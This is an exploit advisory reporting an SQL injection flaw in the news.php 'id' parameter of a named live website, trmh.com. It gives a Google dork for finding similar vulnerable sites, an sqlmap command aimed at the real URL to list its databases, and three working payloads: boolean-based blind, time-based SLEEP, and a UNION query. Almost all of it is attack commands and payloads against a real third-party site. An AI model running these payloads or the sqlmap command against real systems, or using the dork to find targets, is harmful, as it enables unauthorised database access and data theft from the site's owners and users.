****************************
#Exploit Title: TRMH - SQL Injection vulnerability
#Date: 2020-08-12
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://www.trmh.com
#Google Dork: more_details.php?id=
#Tested On: windows 10
sqlmap:
sqlmap -u "https://www.trmh.com/news.php?id=75" -p id --dbs
Testing Method;
- boolean-based blind
- time-based blind
- UNION query
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (6333=6333) THEN 75 ELSE (SELECT 5046 UNION SELECT 9683) END))
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: id=75 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=75 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a626271,0x6868426168486c664e6e75724f4d74796a44726c534e636465477a4170465677617468475958704d,0x7171787071)-- -
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************